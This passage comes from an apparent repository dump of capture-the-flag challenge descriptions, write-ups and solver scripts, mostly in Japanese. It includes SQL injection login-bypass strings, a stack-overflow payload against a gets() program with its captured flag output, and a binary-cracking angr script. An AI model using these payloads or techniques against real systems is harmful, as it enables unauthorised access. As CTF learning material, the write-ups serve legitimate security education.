"length_bytes": 224, "license_type": "no_license", "max_line_length": 161, "num_lines": 3, "path": "/2021/BCACTF_2.0/Easy_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "As part of his CTF101 class, Gerald needs to find the plaintext that his teacher encrypted. Can you help him do his homework? ( It's definetely not cheating ;) )\n\n[enc.txt](https://objects.bcactf.com/bcactf2/easyRSA/enc.txt)" }, { "alpha_fraction": 0.7126865386962891, "alphanum_fraction": 0.7350746393203735, "avg_line_length": 23.272727966308594, "blob_id": "c6cd003c98c8f46cdb3b91fe75718dbf08998647", "content_id": "1ee6d77cb406e2d360089f4f85b49dbc29c11294", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 268, "license_type": "no_license", "max_line_length": 90, "num_lines": 11, "path": "/2021/BCACTF_2.0/More_than_Meets_the_Eye/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend just sent me this file, but it looks pretty empty. Are you able to see anything?\n\n[zwsp.txt](https://objects.bcactf.com/bcactf2/zwsp/zwsp.txt?v=3)\n\nHint 1 of 2\n\nFile names aren't random. What does zwsp mean?\n\nHint 2 of 2\n\nHow do you convert binary to text?\n\n" }, { "alpha_fraction": 0.6198225021362305, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 17.77777862548828, "blob_id": "4d6abcc43c550591d2f2a15c2151a8e147b75e3a", "content_id": "128eb022d4133606afaf5ca310656f3fa8158036", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 676, "license_type": "no_license", "max_line_length": 53, "num_lines": 36, "path": "/2021/WaniCTF21-spring/OUCS/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nio = remote('oucs.cry.wanictf.org','50010')\n\nplaintext = \"\"\nciphertext = \"\"\nn = 0\n\n# Get n\nio.recvuntil('> ')\nio.sendline('4')\nexec(io.recvline().decode('utf-8')) # n\n\n# Get c1\nio.recvuntil('> ')\nio.sendline('1')\nexec(io.recvline().decode('utf-8'))\nflag_encrypt = ciphertext\n\n# Get c2\nio.recvuntil('> ')\nio.sendline('2')\nio.recvuntil('> ')\nio.sendline('0x01')\nexec(io.recvline().decode('utf-8'))\none_encrypt = ciphertext\n\n# decrypt c1*c2 mod n\nio.recvuntil('> ')\nio.sendline('3')\nio.recvuntil('> ')\nio.sendline(str(hex((flag_encrypt * one_encrypt)%n)))\nexec(io.recvline().decode('utf-8'))\n\nplaintext = hex(plaintext - 1)\nprint(bytes.fromhex(plaintext[2:]))\n" }, { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 23.66666603088379, "blob_id": "717a893c95fffdb1c6e53dd80beb2eb4857d27ca", "content_id": "b5cc37642a3322ae8dda30b6339ab89151643193", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 173, "license_type": "no_license", "max_line_length": 89, "num_lines": 6, "path": "/2020/WaniCTF/LCG_crack/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "安全な暗号は安全な乱数から\n`nc lcg.wanictf.org 50001`\n\n[server.py](https://score.wanictf.org/storage/mpwxompyfpmkjnthpqnyjybcztaigekz/server.py)\n\nWriter : Laika" }, { "alpha_fraction": 0.543749988079071, "alphanum_fraction": 0.574999988079071, "avg_line_length": 21.85714340209961, "blob_id": "af2913d62b37434b0bd56f6dd4c9d67e009a9d59", "content_id": "ec3957abc8cff4111bce9683ec2cfa2ef417e392", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 57, "num_lines": 7, "path": "/2021/angstromCTF_2021/Relatively_Simple_Algorithm/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nexec(open(os.path.dirname(__file__) + \"/rsa.txt\").read())\n\nd = pow(e,-1,(p-1)*(q-1))\nm = pow(c,d,n)\nprint(bytes.fromhex(hex(m)[2:]).decode('utf-8'))\n" }, { "alpha_fraction": 0.8626943230628967, "alphanum_fraction": 0.8704662919044495, "avg_line_length": 16.545454025268555, "blob_id": "2d544f26456be519ad9503a57fd23172654d3e2a", "content_id": "fdc2e5530b8293d6f6026b6aa7344b3260c3e968", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 920, "license_type": "no_license", "max_line_length": 46, "num_lines": 22, "path": "/2021/WaniCTF21-spring/Wani_Request_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "RequestBinを使ってみよう!!\n\nhttps://request1.web.wanictf.org/\n\nこの問題ではあどみんちゃんから自分のサーバにアクセスしてもらう必要があります。\n\n自前でサーバを用意するのが難しい方はRequestBinなどのサービスを利用してみましょう。\n\nサーバが用意出来たらいよいよ本番です。\n\n問題ページにアクセスし、あなたが用意したサーバのURLを送信してください。\n\n送信するとあどみんちゃんの秘密のページにあなたの送信したURLのリンクが表示されます。\n\nあどみんちゃんは表示されたリンクをクリックしてあなたのサーバにアクセスしてくれます。\n\nあどみんちゃんからのアクセスを分析して秘密のページを探してみてください。\n\nHINT1 : HTTP ヘッダー\nHINT2 : xss問題ではありません。\n\nWriter : nkt\n" }, { "alpha_fraction": 0.5392156839370728, "alphanum_fraction": 0.6813725233078003, "avg_line_length": 21.66666603088379, "blob_id": "3d9695de8fd23a7c05b9dcb4c25ac40494d858f4", "content_id": "bd11f4b196858d051791fb383c4d1fc339148278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 292, "license_type": "no_license", "max_line_length": 64, "num_lines": 9, "path": "/2021/BCACTF_2.0/Movie-Login-1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49160/ にアクセスするとログイン画面が表示される。\n\n![](img/2021-06-13-13-38-51.png)\n\n`username = admin, password = 1'or'1'='1`にしたところログインでき、フラグが表示された。\n\n<!-- bcactf{s0_y0u_f04nd_th3_fl13r?} -->\n" }, { "alpha_fraction": 0.2801484167575836, "alphanum_fraction": 0.7476809024810791, "avg_line_length": 14.428571701049805, "blob_id": "782770c59aaef544ce9b5d8069df0095b616d7b9", "content_id": "6baf6184e08272ddd4375e27ffdaa1250b9c0182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 805, "license_type": "no_license", "max_line_length": 61, "num_lines": 35, "path": "/2020/kksctf_open_2020/fonction_speciale/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n```\nf(2522521337)=1215221512112317\nf(1215221512112317)=1112111522111511122112131117\nf(1112111522111511122112131117)=31123115223115312221121113317\n```\n\n上記の関数の法則を探る。8未満の数字しかないので8進数?と考えたが、違うっぽい。\n\n末尾が全部7が気になり、出力は末尾が17になっていることに気づいた。\n\n直感的に、X個の数字Yの並びをXYと書く方式を当てはめてみたら上手くいくことが分かった。\n\n```\n例)\n\nf(112223) = 213213\n\n2個の1, 3個の2, 1個の3 = 21 32 13\n```\n\n\n```\nf(2229555555768432252223133777492611)=x\n```\n\nよって`x`は`321965...`となる。\n\n\n<!-- ( 1着狙ったが4位だった :( )\n\n![](img/2020-12-12-18-14-48.png) -->\n\n<!-- kks{3219651716181413221532131123371419121621} -->" }, { "alpha_fraction": 0.791208803653717, "alphanum_fraction": 0.791208803653717, "avg_line_length": 90, "blob_id": "956de3fe0af8a66c37d6130dc84e948ef4d7dbc5", "content_id": "791d5ecad422c4adc487aa2120c6d29c2a0a11b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 90, "num_lines": 1, "path": "/2021/dCTF_2021/Leak_Spin/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We have confident insider report that one of the flags was leaked online. Can you find it?\n" }, { "alpha_fraction": 0.6433988809585571, "alphanum_fraction": 0.6642934679985046, "avg_line_length": 34.69613265991211, "blob_id": "c637e394cc57367bf6b5955c31566a05a33b9814", "content_id": "05fe4968c36075574cc875fed39913b87810957c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6888, "license_type": "no_license", "max_line_length": 99, "num_lines": 181, "path": "/2021/BCACTF_2.0/Honors_ABCs/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムとその実行ファイルが与えられる。\n\n```c\n#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nchar *correct = \"abcdefghijklmnopqrstuvwxyz\";\n\nint main() {\n int grade = 0;\n char response[50];\n\n setbuf(stdout, NULL);\n setbuf(stdin, NULL);\n setbuf(stderr, NULL);\n\n puts(\"Welcome to your first class at BCA: Honors-level ABCs.\");\n puts(\"Because we expect all our students to be perfect, I'm not going to teach you anything.\");\n sleep(2);\n puts(\"Instead, we're going to have a quiz!\");\n puts(\"And, of course, I expect all of you to know the material already.\");\n sleep(2);\n puts(\"\");\n puts(\"╔════════════════════════╗\");\n puts(\"║ THE QUIZ ║\");\n puts(\"║ ║\");\n puts(\"║ 1) Recite the alphabet ║\");\n puts(\"╚════════════════════════╝\");\n puts(\"\");\n printf(\"Answer for 1: \");\n gets(response);\n\n for (int i = 0; i < 26; ++i) {\n if (response[i] == 0)\n break;\n if (response[i] != correct[i])\n break;\n\n grade = i * 4;\n }\n\n if (grade < 60)\n puts(\"An F? I'm sorry, but you clearly need to study harder.\");\n else if (grade < 70)\n puts (\"You didn't fail, but you could do better than a D.\");\n else if (grade < 80)\n puts(\"Not terrible, but a C's nothing to write home about.\");\n else if (grade < 90)\n puts(\"Alright, a B's not bad, I guess.\");\n else if (grade < 100)\n puts(\"Ayyy, nice job on getting an A!\");\n else if (grade == 100) {\n puts(\"Perfect score!\");\n puts(\"You are an model BCA student.\");\n } else {\n puts(\"How did you end up here?\");\n sleep(2);\n puts(\"You must have cheated!\");\n sleep(2);\n puts(\"Let me recite the BCA plagarism policy.\");\n sleep(2);\n\n FILE *fp = fopen(\"flag.txt\", \"r\");\n\n if (fp == NULL) {\n puts(\"Darn, I don't have my student handbook with me.\");\n puts(\"Well, I guess I'll just give you a verbal warning to not cheat again.\");\n puts(\"[If you are seeing this on the remote server, please contact admin].\");\n exit(1);\n }\n\n int c;\n while ((c = getc(fp)) != EOF) {\n putchar(c);\n usleep(20000);\n }\n\n fclose(fp);\n }\n\n puts(\"\");\n puts(\"Alright, class dismissed!\");\n}\n```\n\n`gets`で`response[50]`を超えた入力をし、`grade`変数を書き換えればよい。\n\ngrade変数の入る`$rbp-0x8`のoffsetを調べたところ、72だったので 72+8 の以下80文字を入力したら上手くいった。\n\n```\nAAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AA12345678\n```\n\n```\n$ nc bin.bcactf.com 49155\nWelcome to your first class at BCA: Honors-level ABCs.\nBecause we expect all our students to be perfect, I'm not going to teach you anything.\nInstead, we're going to have a quiz!\nAnd, of course, I expect all of you to know the material already.\n\n╔════════════════════════╗\n║ THE QUIZ ║\n║ ║\n║ 1) Recite the alphabet ║\n╚════════════════════════╝\n\nAnswer for 1: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AA12345678\nHow did you end up here?\nYou must have cheated!\nLet me recite the BCA plagarism policy.\n\nCheating and Plagiarism Policy\n==============================\n\nTo plagiarize is to steal and use (the ideas or writings of another) as one’s\nown (American Heritage Dictionary, 1973:1001). Legally, plagiarism has been\ndefined as the act of appropriating the literary composition of another, or\nparts or passages of his/her writings, or language of the same, and passing them\noff as the product of one’s own mind (O’Rourke v. RKO Radio Pictures: 483). The\nstudent should note that neither of these definitions includes intention or\nmotivation—it is the act itself which constitutes plagiarism. Ignorance, naiveté\nor sloppiness is no excuse.\n\nConsequences for Plagiarism or Cheating\n---------------------------------------\n1st Offense:\n1. A grade of “0” will be given for the assignment or test\n2. Option to re-do assignment with the grade for the redone assignment averaged\n with the zero for a final average not to exceed 50%.\n3. If a student is caught cheating on a test, the student may retake the test;\n the zero on the first test will be averaged with the score on the retake for\n a maximum final test grade of 50%.\n4. Parent notification; required parent conference with an administrator, or\n designee, to determine what further action, if any, should be taken.\n5. A recording of the incident is made by the building supervisor.\n\n2nd Offense:\n1. A grade of “0” will be given for the assignment or test\n2. No make-up option;\n3. Parent notification; required parent conference with an administrator, or\n designee, to determine what further action, if any, should be taken.\n4. A formal recording of the incident is placed in the student’s folder.\n5. A one-day out-of-school suspension is assigned.\n\n3rd Offense:\n1. Loss of course credit\n2. Required parent conference with an administrator, or designee\n3. Up to three-day suspension\n4. Recommendation for alternative placement\n\nPlagiarism and cheating are serious offenses and the Board expects all students\nto be honest in the presentation and submission of their assignments, homework,\ntest answers and any other academic works as the product of their own\nintellectual efforts. Any student who copies verbatim or paraphrases another’s\nwords or ideas or who allows one’s own words or ideas to be copied verbatim or\nparaphrased shall be guilty of plagiarism. A student who shares his own words or\nideas with another or presents another’s words or ideas and attributes them as\nhis own is also guilty of plagiarism.\n\nCheating is acting dishonestly or unfairly in order to gain an advantage. Acts\nof cheating may include the submission of work prepared by another but passing\nit off as one’s own or copying the work or answers of another. It is also an act\nor instance of sharing or allowing to be shared one’s own works, words, answers\nor ideas with others. For more information see Board Policy 5701.\n\nThe above is copied from\nhttps://www.bergen.org/cms/lib/NJ02213295/Centricity/Domain/9/studentHandbook2020_2021-rev-9-24.pdf\nSee, I cited my sources, so I'm obviously not plagiarising.\n\nalso let me add that that's a pretty ugly url\n\nalso also have the flag!\nbcactf{now_i_know_my_A_B_Cs!!_next_time_wont_you_cheat_with_me??}\n\nAlright, class dismissed!\n```\n\n<!-- bcactf{now_i_know_my_A_B_Cs!!_next_time_wont_you_cheat_with_me??} -->\n" }, { "alpha_fraction": 0.6577380895614624, "alphanum_fraction": 0.7529761791229248, "avg_line_length": 31.80487823486328, "blob_id": "86ad5e8b4cbad4f76061865b1e08ab75e3749f3c", "content_id": "fb36c187da54f031b317a0c1eb5795859d917609", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1664, "license_type": "no_license", "max_line_length": 762, "num_lines": 41, "path": "/2020/WaniCTF/chunk_eater/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`file`コマンドを使ってファイル形式を調べる。\n\n```bash\n$ file eaten.png \neaten.png: data\n```\n\nどうやらただのPNGファイルではなさそう。イメージとしても開けない。\n\n`srtings`コマンドを使ってみると、`WANI`という単語が出現する。\n\n```bash\n$ strings eaten.png | head -n 10\nWANI\nsRGB\ngAMA\n\tpHYs\ntEXtSoftware\nAdobe ImageReadyq\n$iTXtXML:com.adobe.xmp\n<?xpacket begin=\"\n\" id=\"W5M0MpCehiHzreSzNTczkc9d\"?> <x:xmpmeta xmlns:x=\"adobe:ns:meta/\" x:xmptk=\"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\" xmlns:xmp=\"http://ns.adobe.com/xap/1.0/\" xmlns:xmpMM=\"http://ns.adobe.com/xap/1.0/mm/\" xmlns:stRef=\"http://ns.adobe.com/xap/1.0/sType/ResourceRef#\" xmp:CreatorTool=\"Adobe Photoshop CS6 (Macintosh)\" xmpMM:InstanceID=\"xmp.iid:A12986FEBD5C11E3A38AFE01A4935390\" xmpMM:DocumentID=\"xmp.did:A12986FFBD5C11E3A38AFE01A4935390\"> <xmpMM:DerivedFrom stRef:instanceID=\"xmp.iid:A12986FCBD5C11E3A38AFE01A4935390\" stRef:documentID=\"xmp.did:A12986FDBD5C11E3A38AFE01A4935390\"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end=\"r\"?>\nPWANIx^\n\n$ strings eaten.png | grep WANI\nWANI\nPWANIx^\nWANI\nWANI\nWANI\n```\n\n最初のWANIをIHDR, 最後のWANIをIEND, それ以外のWANIをIDATにするとPNGとして画像を見ることができる。\n\n* [PNGファイルフォーマット](https://www.setsuki.com/hsp/ext/png.htm)\n\nバイナリの書き換えには`青い空を見上げればいつもそこに白い猫 for うさみみハリケーン`を使用した。\n\n<!-- FLAG{chunk_is_so_yummy!} -->" }, { "alpha_fraction": 0.3140425384044647, "alphanum_fraction": 0.3787234127521515, "avg_line_length": 42.51852035522461, "blob_id": "65cae22aa5b2c170961d0dcad65b73027817de62", "content_id": "d7ab59feff68c18cd0d2e1388863568b2c12f17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1177, "license_type": "no_license", "max_line_length": 111, "num_lines": 27, "path": "/2021/DawgCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# DawgCTF 2021\n\n* https://umbccd.io/\n\n* 2021/05/08 07:00 JST — 2021/05/09 07:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------------------------------ | --------------- | ----: | -----: |\n| Reversing | [Calculator](Calculator) | exe | 50 | 140 |\n| Crypto | [cookin the ramen](cookin_the_ramen) | CyberChef | 50 | 242 |\n| Crypto | [It's Not RSA!](Its_Not_RSA) | Enigma | 100 | 33 |\n| Crypto | [Really Secure Algorithm](Really_Secure_Algorithm) | Wiener's Attack | 150 | 157 |\n| Reversing | [Secret App](Secret_App) | exe | 50 | 142 |\n| Crypto | [The Obligatory RSA Challenge](The_Obligatory_RSA_Challenge) | RSA, n=q^2 | 200 | 146 |\n| Crypto | [TrashChain](TrashChain) | | 250 | 74 |\n\n---\n\n## Result\n\n* 855 points\n\n* 191 / 595 (> 1 pt)\n" }, { "alpha_fraction": 0.3734392821788788, "alphanum_fraction": 0.42678773403167725, "avg_line_length": 24.171428680419922, "blob_id": "38a05f4415f12f74763f2da60a8ff1d624e281d6", "content_id": "c2d0745ca6881194eb8921f586d682c40de812fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1635, "license_type": "no_license", "max_line_length": 287, "num_lines": 35, "path": "/2021/BCACTF_2.0/More_than_Meets_the_Eye/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nPretty empty over here​‌‌​​​‌​​‌‌​​​‌‌​‌‌​​​​‌​‌‌​​​‌‌​‌‌‌​‌​​​‌‌​​‌‌​​‌‌‌‌​‌‌​‌‌‌‌​‌​​​‌‌​​‌‌​‌‌‌​​‌​​​‌‌​​​​​‌​‌‌‌‌‌​‌‌‌​‌‌‌​​‌‌​​​‌​‌‌​​‌​​​‌‌‌​‌​​​‌‌​‌​​​​‌​‌‌‌‌‌​‌‌​‌​‌​​‌‌‌​‌​‌​‌‌​‌‌‌​​‌‌​​‌‌‌​‌‌​‌‌​​​​‌‌​​‌‌​‌​‌‌‌‌‌​‌‌​‌​‌​​​‌‌‌​​​​​‌‌​​‌​​‌‌​​​​‌​‌‌‌‌​​​​‌​​‌​​​​​‌‌​‌​​​‌‌‌‌‌​‌.\n```\n\nバイナリエディタで見ると、何か書かれていることが分かる。\n\n![](img/2021-06-12-21-54-04.png)\n\nZWSPで検索すると、**`ゼロ幅スペース`**の意味であることが分かった。\n\n* https://ja.wikipedia.org/wiki/ゼロ幅スペース\n\nこのテキストには `U+200B = E2808B` と `U+200C = E2808C` のみが含まれているので、これを`0,1`に変換して文字列にする。\n\n```py\nfrom Crypto.Util.number import *\n\ntext = open('zwsp.txt','rb').read()\n\nbinary = ''\nfor i,t in enumerate(text):\n if(t == 0xe2):\n if(text[i:i+3] == b'\\xe2\\x80\\x8b'):\n binary += '0'\n else:\n binary += '1'\n\nprint(long_to_bytes(int(binary,2)))\n```\n\n<!-- bcactf{z3r0_w1dth_jungl3_j82axH4} -->\n" }, { "alpha_fraction": 0.703125, "alphanum_fraction": 0.7708333134651184, "avg_line_length": 20.44444465637207, "blob_id": "1f99df7c526d13c296f01f2771eee3b12dd5f20c", "content_id": "14b2c18f12f27495211283c06ca804633b672c24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 206, "license_type": "no_license", "max_line_length": 129, "num_lines": 9, "path": "/2021/WaniCTF21-spring/Cant_restore_the_flag/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ちりつもですよ\n\n```\nnc crt.cry.wanictf.org 50000\n```\n\n[cry-cant-restore-the-flag.zip](https://score.wanictf.org/storage/bzmve5uv6ynmrs13h0wqx0p1helwb6bl/cry-cant-restore-the-flag.zip)\n\nWriter : Laika" }, { "alpha_fraction": 0.6544715166091919, "alphanum_fraction": 0.7642276287078857, "avg_line_length": 34.14285659790039, "blob_id": "a1527766eb20d4e4ca1784a2386225df1896e20e", "content_id": "ed249770a94f350c13e7e2aba798aa344978da41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 125, "num_lines": 7, "path": "/2021/dCTF_2021/Just_Take_Your_Time/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Let's go. In and out. 2 second adventure.\n\n```\nnc dctf-chall-just-take-your-time.westeurope.azurecontainer.io 9999\n```\n\n[just-take-your-time.py](https://dctf.dragonsec.si/files/c357be91113fd46c23f6c77b335f9366/just-take-your-time.py?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTUxfQ.YKDNkA.4Rpai0RUifp7XfN5fphD4TTmH2U)\n" }, { "alpha_fraction": 0.5114942789077759, "alphanum_fraction": 0.6091954112052917, "avg_line_length": 12.384614944458008, "blob_id": "f667dfe9a2c1b186cf63cf9a8853c613878717b0", "content_id": "55dd9f813fe80187f1c057804d276766a9ba469a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 548, "license_type": "no_license", "max_line_length": 56, "num_lines": 26, "path": "/2021/BCACTF_2.0/Movie-Login-2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49153/ にアクセスする。\n\n`Movie-Login-1`と同様にログイン画面が表示される。\n\n![](img/2021-06-13-14-52-33.png)\n\n問題に添付されているjsonファイルは以下のようになっており、ここに書かれている文字は使えないようになっている。\n\n```json\n[\n \"1\",\n \"0\",\n \"/\",\n \"=\"\n]\n```\n\n`username = admin`, パスワードを以下のようにしたらログインできた。\n\n```\n2' or '3' > '2\n```\n\n<!-- bcactf{h0w_d1d_y0u_g3t_h3r3_th1s_t1m3?!?} -->\n" }, { "alpha_fraction": 0.7231404781341553, "alphanum_fraction": 0.7644628286361694, "avg_line_length": 33.57143020629883, "blob_id": "83b7ff46f92a48627b8bf49da11859795c07bb2b", "content_id": "8d18457b5fcb02d921cfc0caa1c0d84d5cbf9b6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 242, "license_type": "no_license", "max_line_length": 154, "num_lines": 7, "path": "/2021/BCACTF_2.0/Countdown_Timer/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Get the flag once the countdown timer reaches zero! However, the minimum time you can set for the countdown is 100 days, so you might be here for a while.\n\nhttp://web.bcactf.com:49154/\n\nHint 1 of 1\n\nCan you manipulate a website's JavaScript?\n" }, { "alpha_fraction": 0.6775510311126709, "alphanum_fraction": 0.686734676361084, "avg_line_length": 22.33333396911621, "blob_id": "2627536773e0300249a77b884120b75028e538da", "content_id": "3106e1a63b1373946d5fd56489722e77135c0444", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 980, "license_type": "no_license", "max_line_length": 51, "num_lines": 42, "path": "/2020/CyberSecurityRumble2020/Zeh/haupt.c", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define Hauptroutine main\n#define nichts void\n#define Ganzzahl int\n#define schleife(n) for (Ganzzahl i = n; i--;)\n#define bitrverschieb(n, m) (n) >> (m)\n#define diskreteAddition(n, m) (n) ^ (m)\n#define wenn if\n#define ansonsten else\n#define Zeichen char\n#define Zeiger *\n#define Referenz &\n#define Ausgabe(s) puts(s)\n#define FormatAusgabe printf\n#define FormatEingabe scanf\n#define Zufall rand()\n#define istgleich =\n#define gleichbedeutend ==\n\nnichts Hauptroutine(nichts) {\n Ganzzahl i istgleich Zufall;\n Ganzzahl k istgleich 13;\n Ganzzahl e;\n Ganzzahl Zeiger p istgleich Referenz i;\n\n FormatAusgabe(\"%d\\n\", i);\n fflush(stdout);\n FormatEingabe(\"%d %d\", Referenz k, Referenz e);\n\n schleife(7)\n k istgleich bitrverschieb(Zeiger p, k % 3);\n\n k istgleich diskreteAddition(k, e);\n\n wenn(k gleichbedeutend 53225)\n Ausgabe(Fahne);\n ansonsten\n Ausgabe(\"War wohl nichts!\");\n}\n" }, { "alpha_fraction": 0.6995940208435059, "alphanum_fraction": 0.736129879951477, "avg_line_length": 35.95000076293945, "blob_id": "1b9704d236b5de64497c2eb3cece37b8e12dc0d7", "content_id": "3e07b4d6bb126eeec87062f3961fd8ef2b9af50e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 739, "license_type": "no_license", "max_line_length": 100, "num_lines": 20, "path": "/2021/WaniCTF21-spring/licence/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import angr\n\nbin_path = './rev-licence/licence'\nlicence_path = './rev-licence/key.dat'\n\nproject = angr.Project(bin_path, load_options={\"auto_load_libs\": False})\nmain_addr = project.loader.main_object.get_symbol('main').rebased_addr\nstate = project.factory.entry_state(args=[project.filename, licence_path])\ninput_file = angr.storage.SimFile(licence_path)\nstate.posix.fs = {licence_path: input_file}\n\nsim = project.factory.simulation_manager(state)\n# address from IDA\naddr_fail = [main_addr + (0x5D88-0x5CB0) , main_addr + (0x5DE1-0x5CB0), main_addr + (0x5E44-0x5CB0)]\naddr_success = main_addr + (0x5E66-0x5CB0)\n\nsim.explore(find=addr_success,avoid=addr_fail)\n\nif sim.found:\n print(repr(sim.one_found.fs.get(licence_path).concretize()))\n" }, { "alpha_fraction": 0.6964285969734192, "alphanum_fraction": 0.7827380895614624, "avg_line_length": 66.19999694824219, "blob_id": "36cf5a2dd5955d85267866d06abd3a4f6bf0b003", "content_id": "5dfa359096fbb06de4ae890fc9096ac1ef8551fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 336, "license_type": "no_license", "max_line_length": 209, "num_lines": 5, "path": "/2021/UIUCTF_2021/CEO/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "You just wirelessly captured the handshake of the CEO of a multi-million dollar company! Use your password cracking skills to get the password! Wrap the password in the flag format. E.g: `uiuctf{password}`\n\n**author**: Rohans885\n\n[megacorp-01.cap](https://uiuc.tf/files/d123b87f0f5bc197f73d66134874f1a4/megacorp-01.cap?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjMxfQ.YQVsRQ.-lQ3NRRba2E9Kifx1qT5-GvsstQ)\n" }, { "alpha_fraction": 0.6911764740943909, "alphanum_fraction": 0.845588207244873, "avg_line_length": 14.222222328186035, "blob_id": "f24282cd47a84054706bf46eff144b61fb45f40b", "content_id": "515eda200389149286051af659452a57a139bc1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 258, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/2020/WaniCTF/DevTools_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "開発者ツールを使うと表示を書き換えることができます。\n\n5000兆円欲しい!\n\n(5000000000000000円持っていることにするとフラグを手に入れることができます。)\n\nhttps://devtools2.wanictf.org\n\nWriter : suuhito" }, { "alpha_fraction": 0.7042253613471985, "alphanum_fraction": 0.8262910842895508, "avg_line_length": 29.285715103149414, "blob_id": "3c20aadd18b35c7d2d876f2118cb85d178b2c3f3", "content_id": "f4e73a9e365a8cc60df84333885f0fba39f1b938", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 223, "license_type": "no_license", "max_line_length": 121, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/Logical_SEESAW/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We have an innovative seesaw!\n\n[Logical_SEESAW.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/Logical_SEESAW/Logical_SEESAW.tar.gz)\n\n323d2e48e60f4ed521c88acf5d274d3c003ecdd7\n\n想定難易度: Beginner\n\n" }, { "alpha_fraction": 0.557823121547699, "alphanum_fraction": 0.6734693646430969, "avg_line_length": 15.333333015441895, "blob_id": "c6d816a533e929f3f51c65d13e3b3e821053223a", "content_id": "6290e76a49a198e0c65b3cc211d7f5e9f372dbe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": "/2021/redpwnCTF_2021/inspect-me/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttps://inspect-me.mc.ax/ にアクセスする。\n\nソースコードを開発者ツールで見ると、フラグが書かれていた。\n\n![](img/2021-07-10-11-52-19.png)\n\n<!-- 